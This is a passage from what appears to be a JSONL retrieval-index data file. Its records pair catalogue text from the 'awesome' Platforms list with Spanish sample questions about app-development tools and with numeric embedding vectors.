-0.16622, -0.01956, 0.13571, -0.02307, 0.0429, -0.02468, 0.04445, -0.01282, -0.03187, -0.026, -0.00701, 0.00113, 0.00053, 0.00685, -0.09271, 0.21079, -0.12837, 0.03987, -0.00486, -0.07006, 0.05901, -0.04497, -0.00667, 0.02924, -0.01771, -0.01124, -0.01939, -0.06436, 0.07761, -0.04765, -0.13476, 0.03569, -0.04422, -0.11155, 0.00206, -0.0141, -0.0136, -0.0789, 0.08156, -0.07015, -0.02436, -0.06151, 0.08436, -0.06855, -0.06693, 0.08773, -0.02624, 0.13311, 0.03163, 0.12701, -0.05106, -0.06434, 0.04094, 0.01712, -0.07541, 0.02076, 0.12671, -0.01215, 0.04392, 0.00103, 0.00797, -0.09965, -0.10578, -0.0414, -0.01283, 0.01494, 0.01303, -0.11511, 0.06811, -0.01281, 0.04217, -0.00026, 0.10085, -0.00143, -0.01756, -0.04685, 0.06736, -0.02985, -0.04332, 0.00581, -0.05971, -0.07121, -0.04168, 0.03796, 0.03282, 0.03282, 0.03629, -0.02083, 0.08891, 0.03335, -0.03156, -0.1072, -0.05544, -0.01958, -0.02714, -0.02615, -0.06163, 0.03408, 0.03166, -0.02018, -0.07624, 0.00897, 0.0563, 0.04291, -0.06683, -0.05305, 0.0159, -0.0403, -0.05565, -0.06222, -0.0584, 0.00639, 0.14562, -0.10662, 0.07629, 0.03635, 0.00313, -0.06153, 0.02132, 0.04322, -0.02896, -0.02293, -0.00397, 0.01907, -0.02899, 0.00863, 0.0171, -0.09077, -0.04845, -0.00523, 0.04439, 0.05861, -0.05001, 0.08444, -0.13192, -0.00866, -0.04367, 0.002, -0.04119, 0.00986, 0.02708, -0.05873, -0.00341, 0.01791, -0.06391, -0.02672, -0.02358, 0.01038, 0.02426, -0.07969, 0.01332, -0.04305, -0.01681, -0.0304, 0.0208, -0.01899, -0.06967, -0.02917, -0.07176, -0.06715, -0.00675, -0.02862, 0.00503, 0.03547, 0.01236, -0.03145, -0.04502, 0.03686, 0.02908, 0.04708, -0.00602, 0.06239, -0.02727, -0.08079, 0.03119, 0.02244, -0.04787, -0.02082, -0.00672, 0.04902, 0.03432, 0.03605, 0.02415, 0.00552, 0.02708, 0.03628, -0.00751, -0.05919, -0.03252, 0.07159, 0.03284, 0.05362, 0.01371, 0.0587, 0.04209, 0.01394, -0.00367, 0.00422, 0.00925, 0.05191, 0.04426, -0.06701, 0.00541, 0.02897, -0.01095, -0.0314, -0.02472, -0.02441, -0.04808, -0.00811, -0.00338, 0.02123, 0.01166, -0.01497, -0.06116]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Node.js β€” Async non-blocking event-driven JavaScript runtime built on Chrome's V8 JavaScript engine. Cross-Platform β€” Writing cross-platform code on Node.js. Frontend Development. iOS β€” Mobile operating system for Apple phones and tablets. Android β€” Mobile operating system developed by Google. IoT & Hybrid Apps. Electron β€” Cross-platform native desktop apps using JavaScript/HTML/CSS. Cordova β€” JavaScript API for hybrid apps. React Native β€” JavaScript framework for writing natively rendering mobile apps for iOS and Android. Xamarin β€” Mobile app development IDE, testing, and distribution. Containers. eBPF β€” Virtual machine that allows you to write more efficient and powerful tracing and monitoring for Linux systems. Arch-based Projects β€” Linux distributions and projects based on Arch Linux. AppImage β€” Package apps in a single file that works on various mainstream Linux distributions. Omarchy β€” Opinionated Arch Linux and Hyprland desktop environment from the creator of Ruby on Rails. Screensavers. Apps. Open Source Apps.", "indexar": "con que puedo desarrollar aplicaciones mΓ³viles nativas para iOS y Android?", "v": [-0.03016, 0.06984, -0.02213, -0.10843, 0.02303, 0.03019, -0.12514, 0.07355, -0.05427, 0.06848, -0.02399, -0.13068, 0.00014, -0.02071, -0.02616, -0.0352, 0.00922, -0.04806, -0.00295, 0.02967, -0.05222, 0.04733, -0.20959, -0.05903, -0.08308, 0.19996, -0.08823, 0.04145, -0.07113, -0.12366, -0.05869, -0.12918, 0.10619, -0.0458, -0.21577, -0.0844, -0.08873, -0.01738, -0.12636, -0.09082, -0.00191, 0.02685, -0.03367, 0.02046, 0.03304, 0.02211, 0.02195, -0.0354, -0.11366, -0.05168, -0.03062, -0.02676, 0.01026, 0.03399, -0.04162, 0.02163, 0.12661, -0.14201, 0.03144, 0.02493, -0.09837, 0.08696, -0.01656, -0.00644, 0.10413, -0.04061, 0.1016, 0.1562, -0.04617, -0.02506, 0.11303, 0.1024, -0.04774, 0.12115, 0.07929, 0.12046, -0.09206, -0.02664, -0.00206, 0.06668, -0.01422, -0.02285, -0.02038, 0.02135, 0.00398, -0.01619, -0.0019, 0.07749, 0.00443, -0.04484, 1e-05, -0.00017, -0.06833, -0.03611, -0.05651, -0.08928, 0.03947, 0.01106, 0.08017, 0.10556, 0.00854, -0.06653, -0.02042, -0.01226, -0.09479, -0.02213, 0.07997, -0.02824, 0.04511, -0.02205, -0.05593, -0.08891, 0.06568, 0.11586, -0.04517, 0.02099, 0.01205, -0.09949, -0.04794, -0.01776, -0.03596, -0.05898, -0.00356, -0.04137, 0.07504, 0.01299, -0.01989, 0.10789, 0.03106, 0.02103, 0.06335, -0.08469, 0.0124, 0.05535, -0.07262, 0.05436, 0.10801, 0.04547, 0.04935, 0.07116, 0.01645, 0.03218, -0.01183, -0.02464, 0.0844, 0.02975, -0.08175, 0.00407, 0.07598, -0.0144, 0.03699, -0.00211, -0.0761, 0.03131, -0.12447, -0.01158, -0.00093, -0.10815, 0.03095, 0.02142, -0.0718, -0.02771, -0.07497, -0.03389, -0.09468, -0.09406, 0.02547, 0.04308, 0.12835, 0.01139, 0.03404, 0.0338, 0.10687, -0.07028, -0.01317, -0.02616, 0.05417, 0.04489, 0.02891, -0.06701, -0.04016, 0.01499, 0.005, -0.06504, 0.01307, -0.05259, -0.03158, -0.00954, 0.02156, 0.01399, -0.03132, 0.1003, 0.06422, 0.06206, 0.03681, -0.0627, 0.00413, -0.00985, -0.03169, 0.00306, -0.05686, -0.00515, -0.00384, 0.0255, 0.0553, -0.01008, 0.03681, 0.08041, -0.01304, 0.01815, -0.00424, 0.03988, 0.10658, 0.09377, -0.00733, -0.04659, 0.01423, 0.08695, -0.01994, -0.00594, -0.01758, -0.01203, 0.01931, 0.02333, 0.03535, 0.05883, 0.02285, -0.03875, -0.01814, -0.00745, 0.03046, 0.0039, 0.02063, -0.01472, 0.03596, 0.0621, 0.04304, 0.01816, -0.04098, -0.02555, -0.04679, 0.04643, 0.03961, -0.0022, -0.12042, -0.0441, -0.04693, 0.01588, -0.02514, -0.07057, 0.00662, 0.04645, 0.11157, -0.03001, 0.01497, 0.02669]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Node.js β€” Async non-blocking event-driven JavaScript runtime built on Chrome's V8 JavaScript engine. Cross-Platform β€” Writing cross-platform code on Node.js. Frontend Development. iOS β€” Mobile operating system for Apple phones and tablets. Android β€” Mobile operating system developed by Google. IoT & Hybrid Apps. Electron β€” Cross-platform native desktop apps using JavaScript/HTML/CSS. Cordova β€” JavaScript API for hybrid apps. React Native β€” JavaScript framework for writing natively rendering mobile apps for iOS and Android. Xamarin β€” Mobile app development IDE, testing, and distribution. Containers. eBPF β€” Virtual machine that allows you to write more efficient and powerful tracing and monitoring for Linux systems. Arch-based Projects β€” Linux distributions and projects based on Arch Linux. AppImage β€” Package apps in a single file that works on various mainstream Linux distributions. Omarchy β€” Opinionated Arch Linux and Hyprland desktop environment from the creator of Ruby on Rails. Screensavers. Apps. Open Source Apps.", "indexar": "hay alguna herramienta para crear apps hΓ­bridas usando JavaScript?", "v": [0.0328, 0.06095, -0.11318, -0.18254, 0.02928, -0.09997, -0.17837, -0.01787, 0.02827, -0.10729, -0.10459, -0.17335, -0.04387, -0.01367, 0.07838, -0.01112, 0.05828, -0.13786, -0.02682, 0.03145, -0.01123, 0.10655, -0.18886, -0.10785, -0.1523, -0.10079, 0.04138, 0.10002, -0.26843, -0.01739, 0.03807, 0.02888, 0.05361, 0.02787, -0.22194, -0.05464, 0.00865, 0.03984, -0.03595, 0.02564, 0.03178, 0.09393, -0.01298, 0.00296, -0.0624, 0.09261, 0.03635, -0.00452, -0.09986, 0.05438, 0.02646, -0.07582, -0.23976, 0.07487, -0.00215, -0.11206, 0.13363, -0.1911, -0.04721, -0.07446, -0.00638, 0.01794, -0.04638, -0.00425, -0.0043, -0.09074, 0.03422, -0.00532, -0.05956, 0.09426, -0.00796, -0.01887, -0.04171, -0.00847, 0.0755, 0.02799, -0.0154, -0.06581, 0.00428, 0.02612, 0.07164, -0.08154, -0.03049, 0.00482, -0.0361, -0.06441, 0.07044, 0.06603, 0.06474, -0.01798, -0.03586, 0.00517, -0.03064, -0.03171, -0.00586, -0.05891, 0.04179, -0.01464, 0.07745, 0.00194, 0.10502, -0.05482, -0.06337, 0.01632, -0.05374, 0.03437, 0.01592, -0.03512, 0.02631, 0.0709, 0.09497, -0.00483, -0.00302, -0.00274, 0.01322, 0.10327, 0.0709, -0.08431, 0.01079, -0.06065, 0.04235, 0.04187, -0.08164, -0.09057, 0.01032, 0.00223, -0.02366, 0.10439, -0.03232, -0.02208, -0.02553, -0.00825, -0.11905, 0.03707, -0.00792, 0.07393, 0.04229, -0.02465, -0.02942, -0.02317, 0.00967, 0.05199, 0.03279, -0.08051, 0.00042, 0.07794, -0.02255, 0.00289, 0.01687, 0.03141, 0.04584, -0.12152, -0.0213, 0.01762, -0.11037, -0.04279, -0.07469, -0.01779, -0.06437, 0.03473, -0.03843, -0.03351, -0.0271, 0.00203, -0.01255, -0.03699, 0.06028, 0.02248, 0.02647, 0.04865, 0.05217, 0.04539, 0.09186, -0.01673, 0.00967, -0.00995, -0.01575, -0.0311, -0.01043, -0.04746, -0.0078, -0.04977, -0.05598, -0.01551, 0.00875, -0.05392, 0.03016, -0.00527, 0.01548, -0.02179, -0.06478, 0.06245, 0.03289, -0.05614, 0.0925, 0.02218, 0.03584, -0.04119, 0.00944, 0.01492, -0.01655, 0.02062, -0.01077, -0.02303, -0.00941, -0.01094, -0.02101, -0.00423, -0.01171, 0.01977, 0.01144, -0.03648, -0.00612, 0.04193, 0.00618, -0.01526, -0.04114, 0.08048, 0.03607, -0.01562, 0.01097, -0.03278, -0.02191, 0.02316, 0.05123, 0.08206, 0.00584, -0.02975, 0.0042, -0.00562, 0.00016, -0.10126, -0.00624, 0.02636, -0.01623, 0.01743, 0.01771, 0.01811, -0.06993, -0.03025, -0.01331, 0.02065, 0.0219, -0.00764, -0.07681, -0.00855, 0.0133, -0.02657, -0.02161, -0.05756, -7e-05, 0.02939, 0.0268, -0.07241, 0.00528, 0.05492]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Node.js β€” Async non-blocking event-driven JavaScript runtime built on Chrome's V8 JavaScript engine. Cross-Platform β€” Writing cross-platform code on Node.js. Frontend Development. iOS β€” Mobile operating system for Apple phones and tablets. Android β€” Mobile operating system developed by Google. IoT & Hybrid Apps. Electron β€” Cross-platform native desktop apps using JavaScript/HTML/CSS. Cordova β€” JavaScript API for hybrid apps. React Native β€” JavaScript framework for writing natively rendering mobile apps for iOS and Android. Xamarin β€” Mobile app development IDE, testing, and distribution. Containers. eBPF β€” Virtual machine that allows you to write more efficient and powerful tracing and monitoring for Linux systems. Arch-based Projects β€” Linux distributions and projects based on Arch Linux. AppImage β€” Package apps in a single file that works on various mainstream Linux distributions. Omarchy β€” Opinionated Arch Linux and Hyprland desktop environment from the creator of Ruby on Rails. Screensavers. Apps. Open Source Apps.", "indexar": "que programa me sirve para hacer desarrollo de escritorio en Windows, Mac y Linux con cΓ³digo web?", "v": [-0.01562, -0.03219, -0.06198, -0.25071, -0.062, -0.1773, -0.15986, 0.05187, -0.04356, -0.06568, 0.01219, -0.1761, -0.01142, -0.20056, -0.04797, -0.03517, 0.04527, -0.11438, 0.03214, -0.03573, 0.01796, 0.06205, -0.12642, -0.00922, 0.02831, 0.03514, 0.0362, -0.10565, -0.03795, 0.02181, -0.03417, 0.06146, -0.01503, 0.00489, -0.03551, 0.06424, 0.07647, -0.03137, 0.00575, 0.16112, 0.03362, 0.04533, 0.00052, 0.04883, -0.00723, -0.11708, 0.16859, -0.06851, 0.02749, -0.04868, -0.02847, -0.07343, 0.01307, 0.01723, 0.10076, -0.01063, 0.07713, -0.13499, -0.02074, 0.06285, -0.08034, 0.04671, -0.01001, -0.10467, 0.02034, 0.02503, 0.02909, -0.01603, -0.07101, 0.11355, -0.0507, 0.09212, 0.0377, -0.06721, 0.07276, 0.05737, -0.10178, -0.05262, 0.09435, 0.01841, 0.02284, 0.05515, -0.02094, 0.02848, -0.06438, -0.14878, 0.01896, -0.02589, 0.00996, -0.01574, 0.09896, 0.0275, -0.06621, 0.05946, 0.0915, -0.07174, 0.09083, 0.05478, 0.03377, -0.00168, -0.01476, -0.07919, -0.08539, 0.0866, 0.03631, 0.11593, 0.07826, -0.03791, -0.08029, -0.00471, 0.02038, -0.01653, -0.06241, -0.0126, -0.1274, -0.06014, 0.02782, -0.01706, -0.00214, -0.04773, -0.12097, 0.04615, -0.09119, 0.0634, -0.03538, 0.00279, -0.00215, 0.16501, -0.08383, 0.00175, 0.01143, -0.1174, -0.03538, 0.02273, -0.05911, 0.04272, 0.04042, -0.03865, 0.03792, 0.0043, 0.0788, 0.07508, 0.0349, 0.10031, 0.0215, 0.01707, 0.0687, -0.00918, -0.04456, -0.05938, 0.00211, 0.02169, -0.0014, -0.03797, -0.14085, -0.03002, 0.00279, 0.08281, 0.00627, -0.02557, -0.05968, 0.02237, -0.00076, 0.00798, -0.00257, 0.02279, -0.01567, 0.0681, 0.05374, 0.02935, -0.01533, 0.05189, 0.06295, -0.11297, 0.01516, -0.05142, 0.02137, -0.01663, -0.04341, -0.00635, -0.06866, 0.06394, 0.07764, -0.00052, -0.02485, 0.03057, -0.06072, 0.04184, -0.04403, -0.00241, -0.01893, -0.00285, 0.01601, -0.02912, -0.02737, 0.0308, -0.03094, -0.01507, 0.02437, -0.05578, -0.07817, 0.02594, 0.00513, -0.03842, 0.05408, 0.07776, -0.0439, -0.00377, 0.02493, 0.07978, -0.00567, 0.02176, 0.06759, 0.0095, -0.01441, -0.04119, 0.07803, 0.06814, 0.09124, -0.02258, 0.00536, -0.03861, 0.01657, 0.00909, 0.04083, -0.09417, -0.01917, 0.0034, 0.02853, -0.00259, 0.02565, -0.03827, 0.00142, -0.01234, 0.00655, 0.01727, -0.00515, -0.01549, -0.06149, -0.04757, -0.07735, 0.0685, -0.00528, -0.08481, -0.07046, -0.03284, -0.05949, -0.05272, -0.03227, -0.0226, -0.05054, -0.03946, 0.03825, -0.03785, -0.03333, 0.07669]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: watchOS β€” Operating system for the Apple Watch. JVM. Salesforce. Amazon Web Services. Windows β€” Consumer desktop operating system. PowerToys Run Plugins β€” Community plugins for the Windows quick launcher. IPFS β€” P2P hypermedia protocol. Fuse β€” Mobile development tools. Heroku β€” Cloud platform as a service. Raspberry Pi β€” Credit card-sized computer aimed at teaching kids programming, but capable of a lot more. Qt β€” Cross-platform GUI app framework. WebExtensions β€” Cross-browser extension system. Smart TV β€” Create apps for different TV platforms. GNOME β€” Simple and distraction-free desktop environment for Linux. KDE β€” A free software community dedicated to creating an open and user-friendly computing experience. .NET. Core. Roslyn β€” Open-source compilers and code analysis APIs for C# and VB.NET languages. DigitalOcean β€” Cloud computing platform designed for developers. Flutter β€” Google's mobile SDK for building native iOS and Android apps from a single codebase written in Dart.", "indexar": "con quΓ© puedo crear una aplicaciΓ³n mΓ³vil nativa para iPhone y Android desde un solo cΓ³digo?", "v": [-0.05237, 0.04692, -0.01169, -0.03775, -0.00382, -0.07969, -0.10229, 0.07589, -0.08469, -0.03672, -0.06063, -0.19647, 0.01601, -0.06849, -0.03042, -0.03064, 0.02769, -0.11428, 0.06972, 0.0178, -0.06447, 0.00885, -0.1708, -0.09425, -0.06042, 0.1045, -0.0335, 0.05809, -0.09603, -0.11833, 0.00571, -0.08648, 0.1241, 0.03578, -0.18184, -0.03421, 0.03264, 0.00042, -0.14198, -0.01471, 0.00738, 0.05388, -0.0497, 0.08331, 0.0043, 0.07183, 0.05017, -0.01069, -0.09861, 0.01952, -0.03963, -0.02203, -0.04226, 0.01364, -0.03708, 0.04684, 0.12721, -0.19667, 0.05039, 0.04595, -0.04593, 0.02299, -0.01916, -0.02484, 0.09441, -0.03906, 0.13292, 0.14624, -0.05791, -0.01592, 0.05548, 0.04232, -0.1278, 0.05105, 0.15179, 0.11978, -0.10344, -0.06319, -0.00261, 0.06491, 0.00662, -0.03346, -0.05989, -0.03752, -0.01559, 0.00123, 0.04087, 0.00946, 0.01116, -0.10725, 0.02382, 0.03314, -0.04896, 0.0005, -0.02485, -0.03638, 0.01939, 0.02201, 0.0558, 0.08731, 0.07588, -0.12658, 0.01375, -0.00337, 0.0284, 0.00725, 0.08379, -0.03627, 0.01777, -0.02254, -0.06127, -0.11575, 0.00508, 0.06328, -0.07004, -0.02372, -0.00578, -0.03712, -0.09409, -0.03943, -0.04304, -0.02438, -0.03195, -0.02794, 0.10855, 0.04909, -0.01158, 0.11253, 0.01987, -0.02483, 0.02238, -0.04253, 0.00116, 0.04378, -0.04286, 0.07188, 0.11268, 0.07118, -0.00421, 0.07678, 0.01717, 0.03452, 0.00472, 0.00084, 0.03192, 0.07126, -0.06673, -0.02359, 0.0365, 0.04045, 0.01532, 0.04043, -0.10939, 0.02789, -0.12941, 0.03671, -0.01725, -0.1132, 0.05268, -0.01594, -0.08589, -0.04166, -0.10402, -0.05228, -0.07785, -0.10587, -0.00403, -0.02161, 0.14869, -9e-05, 0.0228, 0.04235, 0.09477, -0.0813, 0.01725, -0.02914, 0.03768, 0.01149, -0.00334, -0.0815, -0.03959, 0.06714, 0.04, -0.07861, 0.02988, -0.04059, 0.00649, 0.00877, 0.02308, -0.00144, -0.00594, 0.11899, 0.04232, 0.07728, -0.00811, -0.06848, 0.00397, -0.02505, -0.00594, -0.02988, -0.05381, 0.02026, 0.01427, -0.00694, 0.06453, 0.02578, -0.01134, 0.0751, -0.04078, 0.0651, 0.00642, -0.01457, 0.11779, 0.09297, -0.04084, 0.01171, 0.00429, 0.05361, -0.02079, -0.01412, 0.032, -0.0115, 0.02777, 0.01093, 0.02328, 0.07507, 0.01409, -0.01943, -0.01615, 0.01759, -0.00065, -0.01131, 0.02077, -0.0141, 0.07367, 0.08503, 0.0564, 0.00081, -0.05529, -0.05683, -0.03062, 0.05212, 0.02391, -0.00941, -0.08143, -0.03006, -0.04957, 0.04126, -0.02635, -0.08158, -0.00974, 0.045, 0.11268, -0.04748, 0.01379, 0.0056]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: watchOS β€” Operating system for the Apple Watch. JVM. Salesforce. Amazon Web Services. Windows β€” Consumer desktop operating system. PowerToys Run Plugins β€” Community plugins for the Windows quick launcher. IPFS β€” P2P hypermedia protocol. Fuse β€” Mobile development tools. Heroku β€” Cloud platform as a service. Raspberry Pi β€” Credit card-sized computer aimed at teaching kids programming, but capable of a lot more. Qt β€” Cross-platform GUI app framework. WebExtensions β€” Cross-browser extension system. Smart TV β€” Create apps for different TV platforms. GNOME β€” Simple and distraction-free desktop environment for Linux. KDE β€” A free software community dedicated to creating an open and user-friendly computing experience. .NET. Core. Roslyn β€” Open-source compilers and code analysis APIs for C# and VB.NET languages. DigitalOcean β€” Cloud computing platform designed for developers. Flutter β€” Google's mobile SDK for building native iOS and Android apps from a single codebase written in Dart.", "indexar": "quΓ© herramientas me sirven para desarrollar interfaces grΓ‘ficas que funcionen en diferentes sistemas operativos?", "v": [0.14811, 0.12293, -0.12059, -0.18746, 0.09453, -0.16372, -0.03069, -0.0751, -0.03041, 0.0046, -0.07247, -0.01559, -0.05814, -0.09614, 0.18495, 0.02073, 0.05751, -0.17763, -0.04277, -0.07174, -0.12782, 0.0513, -0.03396, -0.06645, -0.12547, 0.00292, 0.04756, -0.12564, -0.19881, 0.0479, 0.05453, -0.001, 0.14884, -0.11526, -0.13665, -0.10649, -0.1243, 0.00333, 0.02599, 0.03278, 0.01201, -0.04409, -0.10789, -0.0039, 0.15096, -0.04261, -0.06001, -0.00744, -0.00377, -0.00598, -0.06205, -0.12785, -0.06784, 0.00442, 0.00296, -0.22469, 0.07928, -0.1134, 0.05827, 0.03749, -0.08375, 0.07896, 0.03811, -0.03539, 0.09171, -0.03487, -0.04229, -0.07385, -0.0556, 0.10875, 0.00127, 0.10812, 0.02183, 0.0328, 0.08105, 0.09088, 0.02472, 0.04652, 0.01404, 0.00586, 0.03673, 0.06021, -0.1201, 0.07725, -0.00715, -0.0874, 0.01774, 0.02082, -0.08617, -0.06546, 0.02445, -0.0199, -0.05041, -0.00135, 0.04155, 0.01443, -0.00186, 0.03209, 0.05891, 0.01039, 0.01215, -0.08448, -0.12643, 0.02291, -0.07398, -0.04579, 0.03007, 0.02118, 0.01774, -0.02489, -0.01016, 0.05259, 0.02123, -0.00263, -0.07345, 0.04439, 0.03096, -0.0824, -0.01418, -0.07137, -0.0676, 0.06602, -2e-05, 0.05448, 0.01339, -0.00305, -0.01517, 0.11535, 0.02678, 0.00895, -0.02402, -0.04254, -0.02785, 0.0272, -0.01409, 0.00032, 0.06063, -0.05441, 0.03096, -0.0392, 0.01841, 0.07297, 0.03533, -0.03608, 0.04325, 0.05052, 0.06781, -0.12388, -0.03187, -0.0605, 0.02531, -0.04437, -0.0586, 0.04322, 0.01406, -0.02424, 0.01232, -0.06737, -0.08223, 0.01011, -0.02037, 0.0159, -0.00665, 0.03974, -0.05431, -0.01958, -0.03874, 0.05522, 0.09424, 0.06589, -0.00472, 0.07988, 0.06667, -0.06026, 0.03838, -0.01883, -0.08567, 0.01418, 0.00644, -0.04061, -0.05313, 0.03498, 0.01086, -0.01615, -0.00871, -0.04805, -0.03451, -0.02493, 0.01103, 0.0533, -0.01656, 0.0518, -0.02619, -0.00361, 0.04137, -0.03059, 0.02312, -0.02801, -0.02351, -0.05943, 0.00522, 0.00272, 0.02867, -0.06363, 0.03479, 0.07206, 0.02095, 0.04813, 0.0162, 0.0047, 0.02773, 0.02935, 0.04078, -0.02524, -0.03434, -0.06825, -0.01674, 0.02925, 0.0289, -0.07264, 0.04732, 0.00835, 0.0124, 0.03268, 0.01135, 0.04395, -0.01573, -0.01288, 0.01014, -0.02955, 0.00968, -0.01707, -0.04113, 0.01284, -0.02051, -0.00585, -0.02156, -0.06131, 0.0027, -0.0595, 0.0184, 0.07702, 5e-05, -0.04328, -0.0355, -0.09021, -0.06754, -0.05849, -0.02168, -0.06572, -0.04057, 0.01806, 0.04214, 0.00561, 0.02311, -0.06059]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: watchOS β€” Operating system for the Apple Watch. JVM. Salesforce. Amazon Web Services. Windows β€” Consumer desktop operating system. PowerToys Run Plugins β€” Community plugins for the Windows quick launcher. IPFS β€” P2P hypermedia protocol. Fuse β€” Mobile development tools. Heroku β€” Cloud platform as a service. Raspberry Pi β€” Credit card-sized computer aimed at teaching kids programming, but capable of a lot more. Qt β€” Cross-platform GUI app framework. WebExtensions β€” Cross-browser extension system. Smart TV β€” Create apps for different TV platforms. GNOME β€” Simple and distraction-free desktop environment for Linux. KDE β€” A free software community dedicated to creating an open and user-friendly computing experience. .NET. Core. Roslyn β€” Open-source compilers and code analysis APIs for C# and VB.NET languages. DigitalOcean β€” Cloud computing platform designed for developers. Flutter β€” Google's mobile SDK for building native iOS and Android apps from a single codebase written in Dart.", "indexar": "con quΓ© programa puedo montar aplicaciones para telΓ©fonos inteligentes y tabletas de forma sencilla?", "v": [0.09549, 0.13264, -0.1616, -0.20853, -0.05004, -0.05143, -0.00527, -0.04639, -0.14537, 0.028, -0.03675, -0.05304, -0.00142, -0.03839, 0.01646, 0.03908, 0.05647, -0.13391, 0.10999, -0.03407, -0.0064, 0.01916, -0.22299, -0.1023, -0.04091, 0.08529, -0.01956, 0.0222, -0.06499, 0.00408, -0.00367, -0.06555, 0.02753, -0.05852, -0.16525, -0.01549, -0.01184, -0.01741, 0.00595, -0.01129, -0.05387, -0.01108, 0.03071, 0.0186, 0.07466, 0.07705, 0.04843, -0.05109, 0.01959, 0.03188, -0.07717, -0.02401, 0.06611, 0.08523, -0.05982, -0.09434, 0.12008, -0.12352, 0.00387, -0.04413, -0.01514, 0.03886, 0.00642, 0.07909, 0.10451, 0.00377, 0.10524, 0.11178, -0.12128, -0.06298, 0.06147, -0.01468, 0.01808, 0.01698, 0.04024, 0.1787, -0.11749, -0.08684, 0.09083, 0.0109, -0.00128, -0.06634, -0.04354, 0.01143, 0.0006, -0.03083, 0.0085, -0.00324, -0.08114, -0.06073, 0.02619, 0.03152, 0.02142, 0.0241, -0.00214, -0.04175, 0.07578, 0.06366, 0.05336, 0.17563, -0.01656, -0.04001, -0.08852, 0.11848, -0.16137, 0.049, 0.0476, -0.0429, 0.01154, -0.08278, -0.04421, -0.06438, -0.03841, 0.03676, -0.10185, 0.02172, 0.04474, -0.01548, -0.04989, -0.06386, -0.08762, 0.02111, 0.00282, -0.00409, 0.15176, 0.00179, 0.02347, 0.1473, -0.00453, 0.05678, 0.08088, -0.04871, -0.02663, -0.02346, -0.04176, -0.00302, 0.03367, -0.00862, -0.00462, -0.01131, 0.03454, 0.04111, -0.0407, -0.08676, 0.00255, 0.01435, 0.04881, 0.00352, 0.03087, 0.03168, 0.09346, 0.03394, -0.05218, 0.06057, -0.04837, -0.05732, -0.0153, -0.05045, -0.03372, 0.0802, -0.07283, -0.02196, -0.08832, -0.02314, -0.00585, -0.0738, 0.00561, 0.09201, 0.06908, 0.11565, -0.05789, 0.06121, 0.12215, -0.04376, -0.03293, -0.05677, -0.0181, 0.06726, 0.0045, -0.1005, -0.06471, 0.06215, 0.03514, -0.01424, 0.00661, -0.03066, -0.0475, 0.01486, 0.08187, 0.00085, -0.01286, 0.06664, 0.01779, 0.0172, 0.02853, -0.01563, -0.01722, 0.0106, 0.00579, -0.01592, -0.06329, 0.01234, 0.01378, 0.01004, 0.03563, 0.04854, -0.01006, 0.03487, 0.01387, 0.10321, -0.01616, -0.03254, 0.10197, 0.03883, -0.06356, -0.05623, -0.04644, 0.06127, -0.00424, 0.09531, 0.0197, -0.02367, 0.01521, 0.07057, 0.031, 0.03227, -0.02228, 0.04062, -0.04018, -0.04285, 0.00434, -0.06239, -0.00356, -0.03752, 0.01058, 0.01952, 0.01799, 0.01988, -0.06949, -0.04079, -0.02303, 0.06767, 0.02883, 0.01599, -0.09768, 0.00329, -0.04104, -0.01566, -0.03195, -0.04265, -0.03619, 0.06974, 0.05782, -0.03496, 0.02648, 0.02905]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Home Assistant β€” Open source home automation that puts local control and privacy first. IBM Cloud β€” Cloud platform for developers and companies. Firebase β€” App development platform built on Google Cloud. Adafruit IO β€” Visualize and store data from any device. Cloudflare β€” CDN, DNS, DDoS protection, and security for your site. Actions on Google β€” Developer platform for Google Assistant. ESP β€” Low-cost microcontrollers with WiFi and broad IoT applications. Deno β€” A secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust. DOS β€” Operating system for x86-based personal computers that was popular during the 1980s and early 1990s. Nix β€” Package manager for Linux and other Unix systems that makes package management reliable and reproducible. Integration β€” Linking together different IT systems (components) to functionally cooperate as a whole. Node-RED β€” A programming tool for wiring together hardware devices, APIs, and online services.", "indexar": "quΓ© plataforma es mΓ‘s adecuada para la automatizaciΓ³n del hogar con control local?", "v": [0.03131, 0.10556, -0.08256, -0.15894, 0.0354, -0.06706, 0.01721, -0.02742, -0.1769, 0.01709, -0.18185, -0.10355, 0.03782, 0.03986, 0.06321, -0.01571, 0.08529, -0.11838, -0.0303, 0.09733, -0.103, 0.01814, -0.10776, 0.00776, -0.01983, -0.10103, 0.11094, 0.01647, -0.22794, 0.0037, -0.01299, -0.00218, -0.03259, 0.0881, -0.0475, -0.0499, 0.03341, 0.0868, 0.06324, -0.00495, -0.04217, 0.01378, 0.03937, 0.00682, 0.11512, 0.08102, 0.05569, -0.06922, 0.01172, -0.02161, -0.18734, -0.02637, -0.00623, 0.07769, 0.00962, -0.04333, 0.01904, -0.06871, 0.14884, -0.08259, -0.11485, -0.04068, 0.04957, 0.12129, -0.09398, 0.02612, -0.04979, 0.04631, -0.00222, 0.06619, 